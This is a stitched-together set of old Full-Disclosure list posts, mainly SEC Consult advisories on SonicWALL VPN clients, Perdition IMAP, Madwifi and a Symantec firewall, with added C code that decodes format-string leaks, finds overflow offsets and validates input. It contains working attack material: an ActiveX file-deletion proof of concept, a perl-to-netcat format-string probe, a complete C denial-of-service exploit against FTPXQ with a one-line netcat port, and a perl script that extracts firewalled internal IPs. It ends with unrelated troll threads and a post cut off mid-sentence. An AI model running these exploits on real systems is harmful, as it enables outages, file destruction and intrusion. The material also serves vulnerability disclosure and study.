BB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
--/HostName ---

This vulnerability allows reading from and writing to arbitrary memory addresses within the process memory space. Exploitation is trivial under these circumstances.

vendor status:
---
vendor notified: 2007-08-16
vendor response: 2007-08-29
patch available: 2007-11-26

The issue has been fixed in SonicWALL Global VPN Client 4.0.0.830.

* The vulnerabilities described above have been purchased by SEC Consult from an independent security researcher. In the research bonus programme, SEC Consult is looking for security vulnerabilities in common software products. For more information, contact research [at] sec-consult [dot] com
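Why the %x dump above is more than a crash: each word is four bytes of the client's stack, and several of them spell out the attacker's own configuration string (41414122, 41414141, 25414141 are the bytes "AAA, AAAA and AAA%). Finding the %x position at which the format string itself appears tells an exploit writer which argument slot a later %n will consume, so an address embedded in the name becomes the write target. The following decoder is an added example, not part of the advisory or the researcher's exploit; it assumes a little-endian x86 process and takes the dotted tokens without the "AA"/"BB" marker, since the letters A to F are themselves valid hex digits. The three tokens in main() are copied from the Connection name log excerpt above.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Decode one "%x" token (a 32-bit word printed in hex) into the four bytes it
 * occupies in memory on little-endian x86: the least significant byte sits at
 * the lowest address, so "25414141" is the bytes 41 41 41 25, i.e. "AAA%".
 * Non-printable bytes become '.'. out must hold 5 bytes. Returns 0 on success,
 * -1 if the token is not a hex number of at most eight digits.
 */
int word_to_ascii(const char *hex, char out[5])
{
    char *end;
    unsigned long v = strtoul(hex, &end, 16);
    if (end == hex || *end != '\0' || strlen(hex) > 8)
        return -1;
    for (int i = 0; i < 4; i++) {
        unsigned b = (unsigned)(v >> (8 * i)) & 0xffu;
        out[i] = isprint((int)b) ? (char)b : '.';
    }
    out[4] = '\0';
    return 0;
}

/*
 * Decode a dot-separated run of %x output into the bytes that were on the
 * stack. Returns the number of words decoded, or -1 on a bad token or when
 * out (4 * words + 1 bytes needed) is too small.
 */
int leak_to_ascii(const char *leak, char *out, size_t outlen)
{
    char buf[1024];
    if (strlen(leak) >= sizeof buf)
        return -1;
    strcpy(buf, leak);
    int words = 0;
    out[0] = '\0';
    for (char *tok = strtok(buf, "."); tok != NULL; tok = strtok(NULL, ".")) {
        if ((size_t)(words + 1) * 4 >= outlen)
            return -1;
        if (word_to_ascii(tok, out + words * 4) != 0)
            return -1;
        words++;
    }
    return words;
}

/*
 * 0-based index of the %x conversion whose word holds the first byte of
 * needle, or -1 if needle is not in the leak. That index is the argument slot
 * a %n placed at the same position in the format string would write through.
 */
int find_word_index(const char *leak, const char *needle)
{
    char ascii[1024];
    if (leak_to_ascii(leak, ascii, sizeof ascii) < 0)
        return -1;
    const char *hit = strstr(ascii, needle);
    return hit ? (int)((hit - ascii) / 4) : -1;
}

int main(void)
{
    /* Three consecutive words from the advisory's Connection name log line. */
    const char *leak = "41414122.41414141.25414141";
    char ascii[64];
    leak_to_ascii(leak, ascii, sizeof ascii);
    printf("%s -> \"%s\"  (\"AAA%%\" is word %d)\n", leak, ascii,
           find_word_index(leak, "AAA%"));
    return 0;
}
```

Tokens shorter than eight digits (e64d20 in the log) are legitimate: %x suppresses leading zeros, and strtoul handles them. Bytes above 0x7f print as '.', so a decoded string like "..+x" for 782b8d00 still shows where printable data starts.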
[Full-disclosure] SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client
SEC Consult Security Advisory 20071101-0
=======================================
title: Multiple vulnerabilities in SonicWALL SSL-VPN Client
  * Deletion of arbitrary files on the client
  * Arbitrary code execution through various buffer overflows
program: SonicWALL SSL-VPN
vulnerable version: SonicWALL SSL-VPN 1.3.0.3
  WebCacheCleaner ActiveX Control 1.3.0.3
  NeLaunchCtrl ActiveX Control 2.1.0.49
homepage: www.sonicwall.com
found: 2007-04-23
by: lofi42*
perm. link: http://www.sec-consult.com/303.html
=======================================

Vendor description:
---
SonicWALL SSL-VPN solutions can be configured to provide users with easy-to-use, secure and clientless remote access to a broad range of resources on the corporate network.

Vulnerability overview:
---
The SonicWALL SSL-VPN solution comes with various ActiveX controls which allow users to access the VPN with Internet Explorer. These controls contain various vulnerabilities. An attacker could take control of the affected clients by placing exploit code on a web server. He would then have to entice VPN users to visit the website, e.g. by conducting a phishing attack. Various other attack vectors exist (DNS redirection, owning an intranet website, ...).

Vulnerability details:
---
1.) Deletion of arbitrary files

The WebCacheCleaner ActiveX control provides the method FileDelete() which, working as advertised, allows the attacker to delete arbitrary files on the client.

=== Proof of Concept 1 (VBScript) ===
dim o
Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
o.FileDelete("c:\bla\bla")
=== /Proof of Concept 1 ===

2.) Multiple buffer overflows

A stack-based buffer overflow exists in the AddRouteEntry() method of the NELaunchCtrl ActiveX control. Specifically, the second parameter to this method is copied into a stack buffer without length validation. Use the following to make the process jump into UVWX-land:

o.AddRouteEntry("", "ABCDEFGHIJKLMNOPQRSTUVWX");

Additionally, the following properties suffer from Unicode overflows:
serverAddress
sessionId
clientIPLower
clientIPHigher
userName
domainName
dnsSuffix

=== Proof of Concept 2 ===
A code execution exploit will not be released to the public. However, as exploitation is trivial, we strongly advise to perform an update.

vendor status:
---
vendor notified: 2007-05-21
vendor response: 2007-05-21
patch available: September 2007

The issues have been fixed with version 2.1 of SSL-VPN 200 and version 2.5 of SSL-VPN 2000/4000.

* The vulnerabilities described above have been purchased by SEC Consult from an independent security researcher. In the research bonus programme, SEC Consult is looking for security vulnerabilities in common software products. For more information, contact research [at] sec-consult [dot] com

EOF Bernhard Mueller / SEC Consult
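"UVWX-land" is the register value the debugger shows after the overflow: the 24-letter argument overwrites the saved return address, and on little-endian x86 the four bytes "UVWX" at offset 20 become EIP = 0x58575655. Turning that value back into an offset is the first step of writing the exploit the advisory withholds. The following is an added example and not part of the advisory or the researcher's code: it recovers the offset from a crash value and, for buffers longer than 24 bytes, generates a cyclic pattern (in the style of Metasploit's pattern_create, every 4-byte window unique within the first 20280 bytes) so the same lookup works. The crash value for the cyclic case is constructed in main().

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The argument passed to AddRouteEntry() in the advisory. */
static const char PATTERN[] = "ABCDEFGHIJKLMNOPQRSTUVWX";

/*
 * Byte offset within pattern of the four bytes that ended up in EIP, or -1
 * if the register value does not come from the pattern. x86 is little-endian:
 * the crash value 0x58575655 is the bytes 55 56 57 58 = "UVWX" in memory, so
 * the saved return address began 20 bytes into the string.
 */
int pattern_offset(const char *pattern, uint32_t eip)
{
    char needle[5];
    for (int i = 0; i < 4; i++) {
        needle[i] = (char)((eip >> (8 * i)) & 0xffu);
        if (needle[i] == '\0')
            return -1;                  /* the pattern contains no NUL bytes */
    }
    needle[4] = '\0';
    const char *hit = strstr(pattern, needle);
    return hit ? (int)(hit - pattern) : -1;
}

/* The inverse: the EIP value produced when the return address lands at off. */
uint32_t eip_at_offset(const char *pattern, size_t off)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)(unsigned char)pattern[off + i] << (8 * i);
    return v;
}

/*
 * A 24-letter alphabet only resolves offsets up to 20. For longer buffers
 * fill out (len + 1 bytes) with a cyclic pattern Aa0Aa1Aa2 ... Az9Ba0 ...;
 * every four-byte window is unique within the first 20280 bytes. Returns the
 * number of pattern bytes written.
 */
size_t cyclic_pattern(char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                out[n++] = (char)u;
                if (n < len) out[n++] = (char)l;
                if (n < len) out[n++] = (char)d;
            }
    out[n] = '\0';
    return n;
}

int main(void)
{
    printf("EIP 0x58575655 -> offset %d in %s\n",
           pattern_offset(PATTERN, 0x58575655u), PATTERN);
    char p[1001];
    cyclic_pattern(p, 1000);
    uint32_t crash = eip_at_offset(p, 500);      /* constructed crash value */
    printf("cyclic: EIP 0x%08x -> offset %d\n", crash, pattern_offset(p, crash));
    return 0;
}
```

The lookup returns -1 for any value containing a zero byte. That is exactly what the Unicode overflows in the listed properties produce, since each input character is widened to two bytes (0x00XX) before the copy; for those, decode the register as two UTF-16 code units and search the pattern with the high bytes stripped.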
[Full-disclosure] SEC Consult SA-20071031-0 :: Perdition IMAP Proxy Format String Vulnerability
SEC Consult Security Advisory 20071031-0
=======================================
title: Perdition IMAP proxy str_vwrite format string vulnerability
program: Perdition Mail Retrieval Proxy
vulnerable version: <= 1.17
homepage: http://www.vergenet.net/
found: August 2007
by: Bernhard Mueller / SEC Consult
permanent link: http://www.sec-consult.com/300.html
=======================================

Vendor description:
---
Perdition is a fully featured POP3 and IMAP4 proxy server. It is able to handle both SSL and non-SSL connections and redirect users to a real server based on a database lookup.

Vulnerability overview:
---
Perdition IMAPD is affected by a format string bug in one of its IMAP output-string formatting functions. The bug allows the execution of arbitrary code on the affected server. A successful exploit does not require prior authentication.

Vulnerability details:
---
1.) In certain situations, the IMAP tag (the first part of an IMAP command) is copied into a character buffer without validation. This buffer is then ultimately passed to vsnprintf() as a format string.

2.) Before the call to vsnprintf(), a validation of the format string is performed as a protection against format string injection. From str.c:

168: static const char *__str_vwrite(io_t * io, const flag_t flag,
169:                                 const size_t nargs, const char *fmt, va_list ap,
170:                                 int *bytes)
171: {
(...)
186:     fmt_args = 0;
187:     for (place = 0; fmt[place] != '\0'; place++) {
188:         if (fmt[place] == '%')
189:             fmt[place + 1] == '%' ? place++ : fmt_args++;
190:     }
191:     if (fmt_args != nargs) {
(...)
195:         VANESSA_LOGGER_DEBUG_UNSAFE("nargs and fmt mismatch: "
196:                                     "%d args requested, %d args in format",
197:                                     nargs, fmt_args);
198:         return (NULL);
199:     }
200:
201:     *bytes = vsnprintf(__str_write_buf, STR_WRITE_BUF_LEN - 2, fmt, ap);

In lines 187-191, the actual number of format specifiers is compared to the expected number given in the parameter nargs. This check can however be bypassed by injecting a null byte at the end of the IMAP tag. The null byte cuts off the rest of the string (with the original format specifiers intended by the programmer). Therefore it is possible to inject 'nargs' arbitrary format specifiers within the IMAP tag. In practice, only a single format specifier can be controlled by the attacker. This is not very nice to exploit, however arbitrary code execution is still possible. For example, multiple successive single-byte writes to a global function pointer can be used to gain control of the instruction pointer. Due to the nature of the vulnerability, a good exploit can bypass most OS security features (non-executable stack, ASLR, etc.) as well as compiler features (stack canaries, ...).

Proof-of-Concept:
---
SEC Consult has created a working proof-of-concept (code execution) exploit, which will not be released to the public at this time. The following can be used to test for the vulnerability:

perl -e 'print "abc%n\x00\n"' | nc perdition.example.com 143

Vulnerable versions:
---
Perdition IMAPD <= 1.17

The vulnerability has been fixed in Perdition v1.17.1. The new tarball and Debian packages can be found at:
http://www.vergenet.net/linux/perdition/download/1.17.1/
http://www.vergenet.net/linux/perdition/download/latest/

vendor status:
---
vendor notified: 2007-10-12
vendor response: 2007-10-12
patch available: 2007-10-31

EOF Bernhard Mueller / research [AT] sec-consult [DOT] com
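The bypass in detail, as an added example that is not perdition's code or SEC Consult's exploit: the counting loop from lines 187-190 is reproduced verbatim, the tag is glued in front of a server-side format string exactly as the advisory describes, and the result is counted but deliberately never handed to vsnprintf(). The suffix " OK %s completed" (one argument, so nargs == 1) is a stand-in chosen for this example, not perdition's actual string. With "abc%n" the count is two and the check rejects the reply; with "abc%n\0" the loop never sees the server's %s, the count is one, and the single vararg meant for %s, a char pointer, would become the write target of the attacker's %n. The last function shows the only robust fix: client bytes never enter fmt at all.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * The validation from perdition's __str_vwrite() quoted above: count the
 * conversions in fmt, treating "%%" as a literal percent sign. Like
 * vsnprintf() it stops at the first NUL byte, which is the whole problem.
 */
int count_fmt_args(const char *fmt)
{
    int n = 0;
    for (size_t place = 0; fmt[place] != '\0'; place++) {
        if (fmt[place] == '%') {
            if (fmt[place + 1] == '%')
                place++;
            else
                n++;
        }
    }
    return n;
}

/*
 * Model of the vulnerable path: the tag received from the client (taglen raw
 * bytes, possibly containing a NUL) is copied in front of the server's own
 * format string and the result is used as fmt. Returns a malloc'd buffer of
 * taglen + strlen(suffix) + 1 bytes; the caller frees it.
 */
char *build_fmt_vulnerable(const char *tag, size_t taglen, const char *suffix)
{
    size_t slen = strlen(suffix);
    char *fmt = malloc(taglen + slen + 1);
    if (fmt == NULL)
        return NULL;
    memcpy(fmt, tag, taglen);
    memcpy(fmt + taglen, suffix, slen + 1);
    return fmt;
}

/* 1 if the nargs check would let this tag reach vsnprintf(), 0 if rejected. */
int check_passes(const char *tag, size_t taglen, const char *suffix, int nargs)
{
    char *fmt = build_fmt_vulnerable(tag, taglen, suffix);
    if (fmt == NULL)
        return 0;
    int ok = count_fmt_args(fmt) == nargs;
    free(fmt);
    return ok;
}

/*
 * The fix: the tag is an argument of a constant format string, so "%n" in
 * it is just two characters of output. Returns what snprintf() returns.
 */
int format_reply_safe(char *out, size_t outlen, const char *tag, size_t taglen,
                      const char *what)
{
    return snprintf(out, outlen, "%.*s OK %s completed", (int)taglen, tag, what);
}

int main(void)
{
    const char *suffix = " OK %s completed";              /* stand-in, nargs == 1 */
    printf("tag \"abc%%n\"    passes check: %d\n", check_passes("abc%n", 5, suffix, 1));
    printf("tag \"abc%%n\\0\"  passes check: %d\n", check_passes("abc%n", 6, suffix, 1));
    char out[64];
    format_reply_safe(out, sizeof out, "abc%n", 5, "LOGIN");
    printf("safe reply: %s\n", out);
    return 0;
}
```

Passing ta glen of 6 for the literal "abc%n" copies its terminating NUL into the format buffer, which is the embedded null byte the advisory's perl one-liner sends as \x00. Escaping '%' in the tag would also stop this particular bypass, but it keeps untrusted bytes in the format string; the constant-format version above removes the class of bug.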
[Full-disclosure] SEC Consult SA-20071012-0 :: Madwifi xrates element remote DOS
SEC Consult Security Advisory 20071012-0
=======================================
title: Madwifi xrates element remote DOS
program: Madwifi Linux WLAN driver for Atheros chipsets
vulnerable version: Madwifi <= 0.9.3.2
homepage: www.madwifi.org
found: July 2007
by: Clemens Kolbitsch, Sylvester Keil
    Secure Systems Lab / Technical University of Vienna
    http://seclab.tuwien.ac.at/
    SEC Consult Vulnerability Lab
    http://www.sec-consult.com/
perm. link: http://www.sec-consult.com/298.html
=======================================

Vendor description:
---
MadWifi is one of the most advanced WLAN drivers available for Linux today. It is stable and has an established userbase. The driver itself is open source but depends on the proprietary Hardware Abstraction Layer (HAL) that is available in binary form only.

Vulnerability overview:
---
A specially crafted beacon frame makes the driver call BUG(), leading to a kernel panic on the affected machine. An attacker operating a fake access point could crash any client machine within range that is listening for beacons.

Vulnerability details:
---
In short, the driver hits the BUG() macro if a beacon frame is received whose extended supported rates element carries a length value greater than 15. This leads to a kernel panic. From net80211/ieee80211_scan_sta.c:

217 static int sta_add(...):

	KASSERT(sp->rates[1] <= IEEE80211_RATE_MAXSIZE,
		("rate set too large: %u", sp->rates[1]));
	memcpy(ise->se_rates, sp->rates, 2 + sp->rates[1]);
	if (sp->xrates != NULL) {
		/* XXX validate xrates[1] */
		KASSERT(sp->xrates[1] <= IEEE80211_RATE_MAXSIZE,
			("xrate set too large: %u", sp->xrates[1]));
		memcpy(ise->se_xrates, sp->xrates, 2 + sp->xrates[1]);
	} else
		ise->se_xrates[1] = 0;

IEEE80211_RATE_MAXSIZE is defined as 15. If the KASSERT() fails, the BUG() macro is called, which panics the kernel.

Vulnerability status:
---
The bug has been fixed in SVN revision 2736 [1].

Timeline:
---
vendor notified: 2007-10-11
vendor response: 2007-10-11
patch available: 2007-10-12

Additional info
---
This vulnerability has been found using a novel wireless fuzzing approach developed in a joint project by the Secure Systems Lab (Technical University of Vienna) and the SEC Consult Vulnerability Lab. The technique, which allows very effective stateful fuzzing of wireless drivers by using emulated wireless chipsets, will be presented in detail at the Blackhat Briefings Japan [2] as well as the DeepSec IDSC in Vienna, Austria [3] in the talks by Sylvester Keil and Clemens Kolbitsch.

References
---
[1] http://madwifi.org/changeset/2736
[2] http://www.blackhat.com/html/bh-japan-07/bh-jp-07-main.html
[3] https://deepsec.net/

EOF Bernhard Mueller / research [at] sec-consult [dot] com
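The "XXX validate xrates[1]" comment in the quoted code marks where the missing check belongs: a KASSERT() in a kernel driver turns untrusted input into a panic, whereas validating the tagged elements when the beacon is parsed lets the driver drop the frame and carry on. The following is an added example, not madwifi's code and not the fix in revision 2736: a walker over the information elements of a beacon body that rejects truncated elements and rate sets longer than IEEE80211_RATE_MAXSIZE before anything is copied. The beacon bodies are constructed for the example (rate bytes use the standard 802.11 encoding in 500 kbps units with the basic-rate bit set); the hostile one carries a 16-entry extended rates element, the case that trips the assertion.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IEEE80211_RATE_MAXSIZE   15
#define IEEE80211_ELEMID_SSID     0
#define IEEE80211_ELEMID_RATES    1
#define IEEE80211_ELEMID_XRATES  50

/* Pointers into the frame, the way the driver's scan parameters hold them:
 * each points at the element id byte, so p[1] is the element length. */
struct scanparams {
    const uint8_t *rates;
    const uint8_t *xrates;
};

/*
 * Walk the tagged elements that follow the fixed fields of a beacon body.
 * Returns 0 on success, -1 if an element runs past the end of the frame, and
 * -2 if a (x)rates element is longer than IEEE80211_RATE_MAXSIZE, the input
 * that trips the KASSERT()/BUG() in sta_add(). Rejecting the frame here means
 * a hostile access point costs the client one dropped beacon, not a panic.
 */
int parse_beacon_ies(const uint8_t *ie, size_t len, struct scanparams *sp)
{
    memset(sp, 0, sizeof *sp);
    while (len >= 2) {
        uint8_t id = ie[0], elen = ie[1];
        if ((size_t)elen + 2 > len)
            return -1;
        switch (id) {
        case IEEE80211_ELEMID_RATES:
            if (elen > IEEE80211_RATE_MAXSIZE)
                return -2;
            sp->rates = ie;
            break;
        case IEEE80211_ELEMID_XRATES:
            if (elen > IEEE80211_RATE_MAXSIZE)
                return -2;
            sp->xrates = ie;
            break;
        default:
            break;
        }
        ie += 2 + elen;
        len -= 2 + elen;
    }
    return len == 0 ? 0 : -1;
}

/*
 * The copy from sta_add(), reached only after parse_beacon_ies() accepted the
 * frame, so the memcpy can never exceed the 2 + IEEE80211_RATE_MAXSIZE bytes
 * of the destination. A missing element yields an empty set (se_xrates[1] = 0).
 * Returns the number of bytes stored.
 */
size_t copy_rate_set(uint8_t dst[2 + IEEE80211_RATE_MAXSIZE], const uint8_t *elem)
{
    if (elem == NULL) {
        dst[0] = 0;
        dst[1] = 0;
        return 0;
    }
    memcpy(dst, elem, 2 + elem[1]);
    return 2 + elem[1];
}

/* Constructed beacon bodies (tagged elements only): SSID "lab", eight basic
 * rates, and an extended rates element of 4 entries (benign) or 16 (hostile). */
static const uint8_t BENIGN_IES[] = {
    IEEE80211_ELEMID_SSID, 3, 'l', 'a', 'b',
    IEEE80211_ELEMID_RATES, 8, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24,
    IEEE80211_ELEMID_XRATES, 4, 0x30, 0x48, 0x60, 0x6c,
};
static const uint8_t HOSTILE_IES[] = {
    IEEE80211_ELEMID_SSID, 3, 'l', 'a', 'b',
    IEEE80211_ELEMID_RATES, 8, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24,
    IEEE80211_ELEMID_XRATES, 16, 0x30, 0x48, 0x60, 0x6c, 0x30, 0x48, 0x60, 0x6c,
                                 0x30, 0x48, 0x60, 0x6c, 0x30, 0x48, 0x60, 0x6c,
};

int main(void)
{
    struct scanparams sp;
    printf("benign beacon:  %d\n", parse_beacon_ies(BENIGN_IES, sizeof BENIGN_IES, &sp));
    printf("hostile beacon: %d\n", parse_beacon_ies(HOSTILE_IES, sizeof HOSTILE_IES, &sp));
    return 0;
}
```

The length check against the remaining frame length (the -1 path) is the other half of what a fuzzer like the one described under "Additional info" will find: an element length that points past the end of the received frame is just as hostile as an oversized rate set, and it is caught before any pointer is stored.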
Re: [Full-disclosure] FTPXQ Denial of service exploit.
Hello,

And here's the bash/perl port:

[EMAIL PROTECTED] ~ $ perl -e 'print "USER lol\r\nPASS lol\r\nMKD ".("A"x255)."\r\n"' | nc www.victim.com 21

Cheers,
Bernhard

Federico Fazzi wrote:

/*
 * 0xf_ftpxq.c - FTPXQ Denial of service exploit.
 * Federico Fazzi <[EMAIL PROTECTED]>
 *
 * advisory by Eric Sesterhenn.
 * -- Server built using the WinsockQ from DataWizard Technologies. A security
 * -- vulnerability in the product allows remote attackers to overflow an
 * -- internal buffer by providing an overly long make directory request.
 *
 * r20061025.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

// ..AA*255 in hex format.
char bof[] =
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char **argv)
{
	int sd;
	socklen_t len;
	struct sockaddr_in saddr;
	struct hostent *he;
	char buf[512], tmpbuf[128];

	if(argc != 5) {
		printf("FTPXQ Server - Denial of service exploit.\n"
		       "Federico Fazzi <[EMAIL PROTECTED]>\n\n"
		       "usage: %s <hostname> <port> <user> <password>\n", argv[0]);
		exit(1);
	}

	if((he = gethostbyname(argv[1])) == NULL) {
		perror("gethostbyname()");
		exit(1);
	}

	// init socket
	if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket()");
		exit(1);
	}

	// setup struct
	bzero((char *) &saddr, sizeof(saddr));
	saddr.sin_family = AF_INET;
	bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length);
	saddr.sin_port = htons(atoi(argv[2]));
	len = sizeof(struct sockaddr);

	// init connection
	if(connect(sd, (struct sockaddr *)&saddr, len) == -1) {
		perror("connect()");
		exit(1);
	}

	printf("FTPXQ Server - Denial of service exploit.\n"
	       "Federico Fazzi <[EMAIL PROTECTED]>\n"
	       "---\n");
	puts("connecting..\t\t done");
	// drain the banner so it is not mistaken for the reply to MKD later
	read(sd, tmpbuf, sizeof(tmpbuf));

	// sending a USER data to daemon
	sprintf(buf, "USER %s\r\n", argv[3]);
	write(sd, buf, strlen(buf));
	read(sd, tmpbuf, sizeof(tmpbuf));
	puts("sending USER data..\t done");

	// sending a PASS data to daemon
	sprintf(buf, "PASS %s\r\n", argv[4]);
	write(sd, buf, strlen(buf));
	read(sd, tmpbuf, sizeof(tmpbuf));
	puts("sending PASS data..\t done");

	// sending a BOF string with MKD command to host
	sprintf(buf, "MKD %s\r\n", bof);
	write(sd, buf, strlen(buf));
	puts("sending MKD bof string.. done");

	// now checking if server is down: a closed connection reads as 0
	if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
		puts("[!] server doesn't seem vulnerable");
	else
		puts("[+] server going down.. done");

	close(sd);
	return(0);
}

--
DI (FH) Bernhard Mueller
IT Security Consultant
SEC-Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1080 Vienna, Blindengasse 3
phone +43 1 8903043 0
fax +43 1 8903043 15
mobile +43 676 840301 718
email [EMAIL PROTECTED]
Advisor for your information security.
Re: [Full-disclosure] All new anti-cyber terror website
You have to look more carefully, there actually ARE some 0day techniques
described on the page.

If the buffer limit set by the program can be increased, then your enterprise
class software is compromised, along with data held on local hosts. Also
known as 'buffer limit exaltation' or 'memory allocation widening' attacks.

Q-Ball wrote:
> The promised 0-days are about as real as n3td3v himself.
>
> On 6/15/06, Aaron Gray <[EMAIL PROTECTED]> wrote:
>> Yes, but where are the promised zerodays ? vaporware ?
>>
>> ----- Original Message -----
>> From: n3td3v
>> To: full-disclosure@lists.grok.org.uk ; [EMAIL PROTECTED]
>> Sent: Wednesday, June 14, 2006 6:03 PM
>> Subject: [Full-disclosure] All new anti-cyber terror website
>>
>> === For public distribution. ===
>>
>> New website launched.
>>
>> n3td3v group launched a new website last night and is ready for web
>> traffic.
>>
>> We pride ourselves in our continued work with the underworld at Google
>> and Yahoo.
>>
>> We are a professional group of users with good intentions.
>>
>> Learn more about the all new n3td3v website today.
>>
>> Is your corporation Google or Yahoo? Have you ever wondered who is behind
>> your security incidents?...
>>
>> Its time for n3td3v, its time for http://n3td3v.googlepages.com
>>
>> Remember to click on the security, intelligence and network link(s) at
>> the top of the website!
>>
>> Many Thanks,
>>
>> n3td3v
Re: [Full-disclosure] I'm ready to tell the police
For your own safety, you should ensure that they take you into witness
protection... and when you have your new personality, be careful NOT TO POST
TO ANY SECURITY LISTS! This is not a game anymore.

Good luck!

n3td3v wrote:
> I'm sick of lying for yahoo employees
>
> I've gone on for 7 years lying for them
>
> I want to tell the police everything I know
>
> Someone off list tell me how to report this guy
>
> The n3td3v group was a joint effort of yahoo and google employees
>
> I want to hand them in now
>
> Regards,
> n3td3v
>
> I fell out with an employee, that's why i'm going public
[Full-disclosure] SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure
SEC Consult Security Advisory 20060512-0
==========================================
title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure
program: Symantec Enterprise FW
vulnerable version: 8.0
homepage: www.symantec.com
found: 2005-09-13
by: SEC Consult / www.sec-consult.com
==========================================

Vendor description:
---
Symantec's Enterprise Firewall provides complete network protection by
integrating smart application-level proxies, network circuits and packet
filtering into a special perimeter-security architecture (...)

Vulnerability overview:
---
Enterprise FW leaks the internal IP addresses of NATed machines in response
to certain HTTP requests.

Vulnerability details:
---
A request of the form "get/XX HTTP/1.0" (note the missing space between the
method and the path) triggers the exposure. The firewall appears to forward
the request and wait for a reply from the web server until its timeout is
reached. The final response from the firewall then looks like this:

[EMAIL PROTECTED]:~$ netcat www.behind-raptor.com 80
get/01 http/1.0

HTTP/1.1 504 Gateway Timeout
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Tue, 13 Sep 2005 06:23:32 GMT
Connection: close
Content-Type: text/html
[...]
The request seen by the firewall was:
ttulli http://10.238.94.57/01

The error page echoes the rewritten request, which carries the private
address the proxy substituted for the public host name.

Here's a simple script to map external to internal IPs.
---
#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot] com
#
# [EMAIL PROTECTED]:~/home/sk0L$ perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use IO::Socket;
$| = 1;

$host = $ARGV[0] or die "$0 host\n";
$request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
);
die "could not open socket: $!\n" unless $sock;

print $sock $request;
print "waiting for timeout (this can take about 1 min.)\n";

# the 504 error page echoes the proxied request as http://<internal ip>XXX/XXX
while (<$sock>) {
    if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
        $ip = $1;
    }
}

if (defined($ip)) {
    print "$host: $ip\n";
} else {
    print "failed.\n";
}
close($sock);
---

Vendor status:
---
vendor notified: 2005-09-13
vendor response: 2005-09-13
patch available: 2005-12

General remarks
---
We would like to apologize in advance for potential nonconformities and/or
known issues.

~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com

EOF SEC Consult / @2006
research at sec-consult dot com
Re: [Full-disclosure] Phun! Search
Hello,

n3td3v wrote:
> I have exploit code for this issue, which the list won't be getting hold
> of. The disclosure was to show that I can ask the slurp robot to cache an
> account on the public index,... bla,...

There's no need at all to cache anything at all.

http://mtf.news.yahoo.com/mailto?prop=mycstore&locale=us&h2=n3td3v

will give you the same result as

